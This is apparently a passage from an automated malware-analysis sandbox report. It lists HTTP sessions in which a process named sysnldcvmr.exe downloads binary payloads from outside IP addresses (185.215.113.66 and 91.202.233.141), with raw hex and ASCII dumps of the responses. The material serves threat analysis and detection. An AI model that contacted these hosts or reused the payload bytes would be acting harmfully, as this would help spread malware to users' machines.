                                                                                                                  Nov 30, 2024 01:58:03.393352985 CET1236INData Raw: b3 98 60 7b c2 fe 18 6e 6c 3b f9 ac a2 de d3 91 55 a0 66 42 35 cf 21 d2 35 e4 39 75 47 bc 4a 30 fd b3 ec 68 e2 05 c4 c5 0d b9 52 96 f9 ee 21 eb 75 28 d5 c0 2a 64 ef c0 3a ab 95 53 65 fa 72 6b 02 d9 89 0d 29 a1 42 a0 92 05 af 99 89 64 03 c4 b2 ec
                                                                                                                  Data Ascii: `{nl;UfB5!59uGJ0hR!u(*d:Serk)BdWmlE)Mt9G2?=L*{Pq CT dsHHw+~1uDu,;xuv&eaAwm])pQ`Hvn
                                                                                                                  Nov 30, 2024 01:58:03.393445969 CET1236INData Raw: 5d d4 ae 87 4b 4c 5c f5 f8 b1 42 1c 64 40 21 dd a9 b2 1b 90 9c 81 19 71 86 63 c3 42 58 66 10 97 16 6b 3d 84 2a 17 7d 6e 66 0d 82 1c 4b 89 f7 0c b4 fc 57 4c fe e5 46 ad 79 7f 9e 36 a4 b2 71 69 ed a1 f5 ad 6a 09 6a c9 cc 71 82 36 aa fa 62 12 93 06
                                                                                                                  Data Ascii: ]KL\Bd@!qcBXfk=*}nfKWLFy6qijjq6b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&
                                                                                                                  Nov 30, 2024 01:58:03.393460989 CET248INData Raw: 15 0a b1 41 8b 4d 2d 18 0d 2f 21 95 f5 2c 5d 7f 02 b3 e1 61 f1 81 14 90 ff a6 59 49 c6 b6 95 e1 52 b6 70 e5 9f b1 d7 6f 16 6f 39 ca 52 7f 6a 8d eb 57 0c 60 75 2d b8 22 aa d4 b9 c2 57 7d 76 34 64 44 38 78 a0 68 d0 a0 44 9b 74 71 55 fa f6 a6 80 b6
                                                                                                                  Data Ascii: AM-/!,]aYIRpoo9RjW`u-"W}v4dD8xhDtqUl/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKd
                                                                                                                  Nov 30, 2024 01:58:03.393903971 CET1236INData Raw: 1f c2 c0 01 a9 a1 6d 1c 12 79 22 13 1e 59 39 ac 6f ba 33 c7 51 89 42 71 cf 1c 0c 8a a5 b3 a3 8e 59 56 d1 23 1f 09 19 56 72 38 9b 0a 43 a7 37 de 43 6c 55 38 2e 2a 20 8e 0e 09 cd b6 08 2f b5 3b 37 dc 28 bb df 5e eb 88 be 15 b4 5a 53 48 ba 3e 33 d6
                                                                                                                  Data Ascii: my"Y9o3QBqYV#Vr8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C7W{lxe;c|<>i+,R:ecIfgIDpU^16gr2g"{Sq#<m0r
                                                                                                                  Nov 30, 2024 01:58:03.394025087 CET1236INData Raw: f5 12 b9 95 02 be ba 75 47 ee c3 6f 92 65 e2 78 09 e4 c1 46 cc f6 1a 2a bb a3 8c 2d 7e 51 f6 94 14 b6 19 09 ee 3b 59 30 f7 6f 71 62 a9 7f 81 06 da ca f3 13 9d 08 c3 db 3d 8f 67 08 aa a4 cf 1e b1 d0 cd dc 50 14 2f 04 2d fd 11 53 e2 ae a4 dc c9 10
                                                                                                                  Data Ascii: uGoexF*-~Q;Y0oqb=gP/-SeccZ?m_=UVTM'aYv_w&%k"- 1?3ul2'Kus2)^XCO"N"^E]zgh[
                                                                                                                  Nov 30, 2024 01:58:03.512530088 CET248INData Raw: c9 88 00 75 4b d3 b6 be 4d 95 9b 0d 4d f4 17 76 5e fa 2b 9b 0d 20 96 0b b5 51 59 b2 eb 86 49 f2 fd df a5 5f 55 95 cb 16 94 79 43 38 76 1d ea 1d 23 22 0d e0 3d dc cd 3c 89 ff 1c ea 64 59 7a 0c 20 7f 25 9a ba 2e 3a 4f cf b4 fc 36 ca 60 fb 02 2f fb
                                                                                                                  Data Ascii: uKMMv^+ QYI_UyC8v#"=<dYz %.:O6`/Js=vHBjc0nWNl+7AQ5J'uy^X=T?2hVgpk, R^C!oO.^;G@ ;/0#1myu)p


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  43192.168.2.450075185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:05.643829107 CET166OUTGET /3 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:06.983741045 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:06 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 63232
                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67497f08-f700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
                                                                                                                  Nov 30, 2024 01:58:06.983875036 CET1236INData Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d
                                                                                                                  Data Ascii: 1a@ #o;R`_|#|H%0SH9~`aa-1gH)2sLGnc <k[63N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz|d
                                                                                                                  Nov 30, 2024 01:58:06.983889103 CET1236INData Raw: 61 fd 3b da ac 5e 3b f8 33 7c 1b c1 0c 1d 56 7e 50 3f c2 fa 81 13 af aa 2f c8 95 e8 36 df 81 5c 66 94 8a f9 ce 98 df b2 af d9 e7 86 8b 86 8a 8e 12 bc 6e 99 34 38 be 43 e1 a8 a3 35 1f b8 c8 a9 9a 71 82 42 37 b8 af 12 3a 07 5a 08 52 88 6c 72 d8 5b
                                                                                                                  Data Ascii: a;^;3|V~P?/6\fn48C5qB7:ZRlr[X3V8+N[6s>FHj,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]
                                                                                                                  Nov 30, 2024 01:58:06.984405041 CET372INData Raw: b3 14 96 cb 1c 0a 64 65 9f 17 1d 52 f9 ae 09 c2 59 f9 97 5b 06 44 1f 60 d5 dc 83 2e 98 cf df f1 08 5d 1d 36 10 63 69 37 f3 11 47 73 c1 1c ec 75 9f a3 5e 11 a4 d3 cd 83 6a 32 cd da 5f a2 80 b4 0b 03 1e 6e e5 80 35 9f 8f 49 86 b6 da c7 ab 4e 6a ba
                                                                                                                  Data Ascii: deRY[D`.]6ci7Gsu^j2_n5INj.`/#(W{[uhRfdy6z[$PzqmAEH]6t:FvqlDFT|JG9_,l{!G6eMqP_d
                                                                                                                  Nov 30, 2024 01:58:06.984416962 CET1236INData Raw: fc 04 b1 a3 61 a9 3e e9 b8 4f 99 39 08 9c 69 da 46 18 36 3a 4b 73 dc 66 d7 fd c6 fb 18 c4 f0 71 ec dd 69 3d 4e 7f d9 ab 61 42 45 69 3f 09 c2 f8 94 ed f4 9a d9 59 30 4f 65 5b 90 4f 6d 9a d5 80 e7 09 b9 42 31 f9 9c c9 1a 0a 46 5f a8 4d 51 63 eb a7
                                                                                                                  Data Ascii: a>O9iF6:Ksfqi=NaBEi?Y0Oe[OmB1F_MQc ~)sWh7z4>(our*Q< M9K=2B[,/+?~gg).L{A]rbAx=p5KZ;ZrZ_f5dQUe
                                                                                                                  Nov 30, 2024 01:58:06.984427929 CET1236INData Raw: c7 b6 4a 74 d2 29 ae 30 5a 13 0d c5 bd ad 85 62 e6 41 ba 2c db e4 33 17 af 92 97 e8 c2 50 6f d3 93 2b 1a d9 ef c8 8c ad 28 76 b1 0a 03 22 aa a4 9d d6 19 b7 f4 a3 21 68 33 93 55 49 99 92 85 49 83 f2 c1 f7 84 ba 94 17 67 0a b6 68 7c b3 3e 5f 83 de
                                                                                                                  Data Ascii: Jt)0ZbA,3Po+(v"!h3UIIgh|>_C+]`OG3de{tlnAj}xAD|kH9GV^zmT{y;c}w3pRy<V=5a=dUYW-XW>1-2$i00*vq=,P
                                                                                                                  Nov 30, 2024 01:58:06.985043049 CET1236INData Raw: 4d 81 90 a2 d9 c9 ea 87 af e7 54 a4 00 ee 8f 86 4d 10 1b 06 cf bd 41 22 9f f2 47 09 3b 4c 20 17 59 91 37 2b c7 68 ae 66 7e 0f 1e 64 ca 7d 4d 56 36 9b 98 57 4e 5b 31 b4 bc 26 40 53 81 3d 1a 94 77 ce 40 60 b6 2c f1 68 f6 fc 84 5d 67 33 81 46 d2 a2
                                                                                                                  Data Ascii: MTMA"G;L Y7+hf~d}MV6WN[1&@S=w@`,h]g3Fq${:T;;hkRfjF7aC;@58Ht}uos(h/R#`qk1#a_Jx;JO)j <SmPC9P/ScTvD6>$Z
                                                                                                                  Nov 30, 2024 01:58:06.985063076 CET1236INData Raw: 0c 53 d4 02 90 34 11 70 3e 2c 3a 9e a3 ad 4d 55 c8 f0 dd 7c c9 1c 8e 87 37 8a ef 89 af a2 45 05 b0 ac 5c ec a7 ed 88 1a 6a 87 0a 11 6c b4 e1 72 43 f7 55 77 56 fd 25 e0 85 29 d1 6c 2a 03 9f d6 95 74 67 c5 76 98 9e e6 df 84 c5 e5 19 99 16 2c 13 e8
                                                                                                                  Data Ascii: S4p>,:MU|7E\jlrCUwV%)l*tgv, 2SaUDQ'Z^CDM`iRSVKskh@t(T!+xR<!e_{);$24S8qwj^rPKC68LzmM>.S}SN
                                                                                                                  Nov 30, 2024 01:58:06.985080957 CET1236INData Raw: ce 20 c9 3f 5f 37 e6 3a e3 e7 ef 2e e3 f7 d4 83 a0 50 7f 70 13 58 c8 f8 0f 99 6b db 59 2e 22 ff a3 02 00 2b 4d c0 3a 2e 43 41 88 3a c9 4f d3 0a e9 2f 45 ef 7a 9d 56 59 ce b2 99 e3 2f 6d 51 d4 ac b9 43 d2 6e a8 aa 2e 5a 62 d8 8d fe 7d ce 40 84 c1
                                                                                                                  Data Ascii: ?_7:.PpXkY."+M:.CA:O/EzVY/mQCn.Zb}@-XF9[@GukKuW*NvpIiA\A>hFLuvY?9?4gcoJ{eN-Z'DI*G)X/]@Q*6yO11y4I#La!5P
                                                                                                                  Nov 30, 2024 01:58:06.985095978 CET1236INData Raw: f8 32 86 82 b6 77 a5 d1 d6 7d 46 34 a1 af 6b ae 3b b0 ec 5a c3 e5 44 ee d0 46 4d 32 3b 03 99 7b db 32 2c d5 b1 9d 42 dc 5f 62 e9 66 c8 94 52 b0 38 cd a3 50 6d 15 64 f5 fd 1f 35 c3 d5 b2 69 80 2b 9d ee e5 e0 e0 f8 9d 5c e5 f7 0d c5 ab 52 ae 6f 54
                                                                                                                  Data Ascii: 2w}F4k;ZDFM2;{2,B_bfR8Pmd5i+\RoTy[ 3o=KxMw.Gvp&QR.(XYIla"@|%]~q_io^P~A:ug3G_3NYNTv:lF.PYlN
                                                                                                                  Nov 30, 2024 01:58:07.104012012 CET776INData Raw: 39 2c 20 2a 66 15 0b 85 bc b3 ca 06 1e 32 e0 93 36 d6 d8 f1 3d 38 38 7b c2 ce f0 c6 46 b0 b8 3b d5 b7 e9 7b c9 88 04 ad ea 87 54 49 8d 6a 76 de 57 d4 5a c9 15 8d b5 2d 16 3b 30 a3 72 7e e2 20 16 85 2f fe a0 71 65 0c 78 5e 1b 48 79 ea 33 65 2f e0
                                                                                                                  Data Ascii: 9, *f26=88{F;{TIjvWZ-;0r~ /qex^Hy3e/,j3)yX6 '5:<s@cTy^hLOIw!(,]ImvSp4m|d)JpM:,5xw[G(Bn'TW&l)B6$KinTo=4S2


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  44192.168.2.450077185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:09.139801025 CET166OUTGET /4 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:10.587563038 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:10 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 55040
                                                                                                                  Last-Modified: Wed, 27 Nov 2024 12:44:32 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67471430-d700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: a5 d1 27 01 80 df b4 90 f7 22 59 62 49 bd 72 10 5e 6c 42 5f 1c 89 9f 02 51 4d 78 3d 5e 77 28 5e cb 02 3a 58 3a c5 e0 84 da 2e 27 a6 19 84 4a 4f ee 08 33 84 cf 6b 04 b9 e1 3e 23 3e 89 7e fa 42 48 bc f9 b6 1e 73 91 7d 1f 65 ed a5 9a 66 26 40 c5 ff 74 8c 9d be 8a 65 1f 22 55 01 91 b5 68 4b 9a 48 57 10 d8 49 66 f1 5c 5d 98 bb 7c f8 41 87 54 8d 73 20 d1 5a c0 f4 bb 58 ad 46 80 bf 8b 88 96 66 f9 b3 b9 6c 03 e9 ac 53 0f 7e f4 90 e9 0b 3b ff 5f 10 92 6f fb 43 1d d2 b0 a7 96 02 e1 92 48 dc 16 5d e7 b9 11 2f a3 11 ba d4 06 8d 1b f8 90 b0 c0 2b ed 69 c6 3c bc 1e 69 d9 aa 13 bd d3 fc 63 04 97 ef 16 56 c3 bf 5c ec 7a 5f 20 33 b8 8c e6 b4 e8 48 e6 ec 7e 55 2c 56 17 55 9c 72 0a 50 65 41 b1 23 fc 0d 96 40 37 50 9a 83 06 ce 95 c0 60 4e 59 a0 5b 96 20 02 a5 2b 93 26 ea 8f 4e 19 b6 85 78 a4 7e 49 13 fd 9e 97 e4 aa 8f 81 01 9f 15 9d 90 f4 f4 a0 eb 9a a0 44 ba 98 14 42 87 ea ca fa 9a bf 1d a3 b3 b2 90 5c f6 14 db 1b 2f de 0f 92 6e c5 c2 28 2b 32 35 76 91 c5 36 98 6a c5 d0 4c b7 25 38 5c a0 5e 3f 5d 02 d4 1b be e7 00 ff [TRUNCATED]
                                                                                                                  Data Ascii: '"YbIr^lB_QMx=^w(^:X:.'JO3k>#>~BHs}ef&@te"UhKHWIf\]|ATs ZXFflS~;_oCH]/+i<icV\z_ 3H~U,VUrPeA#@7P`NY[ +&Nx~IDB\/n(+25v6jL%8\^?]xZI>ri[@s:p2yO6Q`L,h=8KLKZqaY=7"N5)/I&Os},D>)AS7rEpgsIuV`'A$]`\c3)xe.uW=Y"!-/if{":BKsWc%rW&dJ+g4a`2i=Pp*ks@?wCamFyN7y]Mg<.|smCvDO^_5NjX>,aF:S1xSgsP_z(FHOgZclxIq{.FQ=K3-kFI'~6eKLX 1:YO]S^mpkEbWXcF!wU4W]RHTcwkxbZm#&<r_Ee:gaP#_(3tjO
                                                                                                                  Nov 30, 2024 01:58:10.587646008 CET1236INData Raw: bb 3b 85 b5 56 c5 2a c5 de 28 e1 3a dd 6f 3f 3a 35 2d 53 79 7e b4 92 56 8e 87 da 28 35 12 36 e0 18 20 92 8f 17 51 d3 85 ff ee 32 e6 b3 3f 49 46 e4 34 32 6f d5 de f6 12 6b d8 23 43 17 fb b0 d6 3e 12 29 ee 91 88 fe 40 dc 1e 83 38 56 54 9b 20 93 66
                                                                                                                  Data Ascii: ;V*(:o?:5-Sy~V(56 Q2?IF42ok#C>)@8VT f`:zd!UT&RNEBUNfy7i4hlQJo[Rx[n@gU56QWO.|yDE.brfGY<NE$;F@6G*2r.2(z|FS\e<klZ'
                                                                                                                  Nov 30, 2024 01:58:10.587658882 CET1236INData Raw: b6 67 15 e1 f1 a7 67 d2 68 94 11 e9 01 da 41 ba 6b b8 25 d9 5d 28 3a ca 3e 64 aa 95 d3 fa f2 53 4d 11 76 63 43 d2 bc c9 c9 bb 29 49 c4 14 44 e8 82 3e 2f 2c 96 f5 ff ea 5d 0a 1e 20 7c 83 0d 16 7b 1f 87 54 85 d6 79 95 9c 71 2a d2 08 6e 3d 5c f9 21
                                                                                                                  Data Ascii: gghAk%](:>dSMvcC)ID>/,] |{Tyq*n=\!Tofm`54Rh!x.r-#;z$Ahq)$c_]\QvO7Jy_ED;B1q8dJ5-H?];91oElK4V #~
                                                                                                                  Nov 30, 2024 01:58:10.588202953 CET1236INData Raw: 62 23 b7 c2 e2 0d e6 95 a3 6f 80 1e d8 e9 f3 db db 25 f5 de 57 f8 11 1d d5 9b 07 aa e1 03 80 a6 46 e0 f9 4f 2a c4 1d 47 d0 27 e8 fa 0e 37 21 6c 67 70 88 54 92 99 83 08 62 10 0f 03 5a f9 a5 5f e8 0f 4f a9 c2 50 07 e1 e5 b4 09 1a 6e 5a 5c 3d a2 af
                                                                                                                  Data Ascii: b#o%WFO*G'7!lgpTbZ_OPnZ\=>!4*HbHy|gp'iYw8D/9yeW:3n(#g<tr7;GzbI=VBSY~fn|o_^5.~/3h_Cy1Hz*URy^lx
                                                                                                                  Nov 30, 2024 01:58:10.588227034 CET896INData Raw: cb 7c 0f da 22 bf 1c 7d f3 28 31 91 59 58 6a ce 9e 13 33 0f 43 a4 5d e8 c1 58 fe 36 8e 37 1c 74 fb 13 d5 c7 35 47 d0 f1 3c 30 ee 69 db 0d 79 b2 07 52 24 eb 5f 36 cb 98 51 0c db 32 ec b1 8e b4 b8 26 30 cf 9c 6b 69 b6 d8 a2 48 6f 05 ea 50 1d ba ff
                                                                                                                  Data Ascii: |"}(1YXj3C]X67t5G<0iyR$_6Q2&0kiHoPkNJ9Fu@Sg~!~$W1,p$;Im*E>&U!kuxgRd33LAIQ0B%{H;JGUiSP7tcd:ZY
                                                                                                                  Nov 30, 2024 01:58:10.588247061 CET1236INData Raw: 51 f1 8f 4a ff 0f 44 8b 16 2d 6a 20 e3 d6 66 47 b6 14 f5 b3 1f 9b 74 57 4f 39 dd 3e e8 c4 38 ed 19 6d ce 35 86 e4 22 b3 d4 3b 4a 35 8c 11 af a9 ec 73 82 bb 58 ef ae b3 5a 77 bc e7 d5 df 65 80 ab bb c1 4c 9f 9d 79 d4 17 df 4f 3a 58 3b 20 e8 9b 5b
                                                                                                                  Data Ascii: QJD-j fGtWO9>8m5";J5sXZweLyO:X; ["6c){?nU>T8w)[hyq`%DUsT=*RE"%$<&$(c<i`A3jD?#?F4(Zl;<Z-~s%!s
                                                                                                                  Nov 30, 2024 01:58:10.589241982 CET1236INData Raw: 7c f0 f5 81 ce 89 c6 f2 0e 6e c7 a3 f8 78 6e c1 ab de 30 bc 81 39 ec 66 9a e2 02 76 c4 e0 15 f4 d2 b4 78 c6 1f 1d 8d 30 70 9e 57 11 e2 f5 52 dc 29 3b 79 84 46 9e 58 b9 55 95 f4 bf 19 fa 0c 80 b7 cb 49 03 19 d5 a6 a1 b5 74 4e 45 4e 23 9a 51 17 47
                                                                                                                  Data Ascii: |nxn09fvx0pWR);yFXUItNEN#QGikR56k2}Q5"n}*|!e-q+8d(|4Nu1=5.^ _\8v>h-?b=i5h8Zo|mg&$#.=I@PQ-*e.rmubbX
                                                                                                                  Nov 30, 2024 01:58:10.589255095 CET1236INData Raw: fa e9 96 13 9f f0 55 ca 5b e8 cb e2 5a ea ad df ce b9 7b a3 1f 5e b2 75 fe 58 de ed 74 21 66 c5 c9 e9 76 73 cb 32 2d 09 76 da 98 be 34 04 0c bc ca 64 fa 7a c9 c9 ae 82 bf 85 c4 56 b4 62 ca 2c 2a 29 77 01 0c 5f e6 26 6e 34 dd f2 d2 e5 ee 3b 8f 93
                                                                                                                  Data Ascii: U[Z{^uXt!fvs2-v4dzVb,*)w_&n4;j6WNZs`a4]iI4!9nu?J?HLwnQV5-?C~Zy73w%D+hF1okAf`Pg0R1g0a>9kX}
                                                                                                                  Nov 30, 2024 01:58:10.589266062 CET1236INData Raw: 6d 31 94 9e 6e 7e f2 ac bb 1f ea 05 8a 0a 2c 16 09 4c 28 5c f7 4a 45 92 38 e1 4c ba d2 ad 12 8f 2b ce ac df a7 c9 34 38 b1 59 e3 63 1f 11 d1 54 2b da f1 3c b4 35 0e d4 72 4e 28 b1 1b cb b6 f6 83 3d ce 17 79 63 5c c6 58 e0 e1 58 b5 b0 37 bf 91 2b
                                                                                                                  Data Ascii: m1n~,L(\JE8L+48YcT+<5rN(=yc\XX7+_NlA~:mqB3N(rM-wO,/4S;i(u^\TS{Sb#K>z>ap-LCd>_`}{9843wBXIy}CD"M
                                                                                                                  Nov 30, 2024 01:58:10.590040922 CET1236INData Raw: f8 8f f8 6a 0b c9 fd bf 9e 71 de d5 aa 32 69 71 49 ad 9f d3 f4 e6 fa 21 5c 16 38 b1 65 ff f0 0a 56 15 02 ce 53 74 12 9f 07 b1 be 5d b2 eb e0 de 28 ca ee 85 5e 2a 7a 15 da bd cc 46 d8 08 9c 8a 0e 76 6e ee 08 3a e0 a5 2f 01 ea f4 bf b1 4b 3d ce 6f
                                                                                                                  Data Ascii: jq2iqI!\8eVSt](^*zFvn:/K=o^rCGdiV}jk\~|6z;:'%OY5lpP&ZxcW;P$6&a#14b~f6PgutN_/}]^}R
                                                                                                                  Nov 30, 2024 01:58:10.709124088 CET1236INData Raw: 53 9d 0d 82 c4 65 f0 5c 23 1e 9a 1b 64 d9 5b 99 86 6c 6c cd 0c 0d 10 6a 4f 6d 12 4e 4b 5b e4 0e a6 0d b8 1f e7 8c 37 1e 85 07 6a a4 a8 44 98 39 81 78 03 a1 17 d4 af bd a0 fb 9b 5e d8 f8 fb 06 5b c4 6d 03 5c db 04 78 94 ec 0b 27 08 a5 0a 23 87 e6
                                                                                                                  Data Ascii: Se\#d[lljOmNK[7jD9x^[m\x'#f@QL#+@fqcG&jYK?QD7sQxR&.|I`6$ +,Gj~;lYDg\t)!j]UlG@qK~


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  45192.168.2.450078185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:12.732995987 CET166OUTGET /5 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:14.120537996 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:13 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  46192.168.2.45008091.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:17.543010950 CET166OUTGET /1 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:58:18.867265940 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:18 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
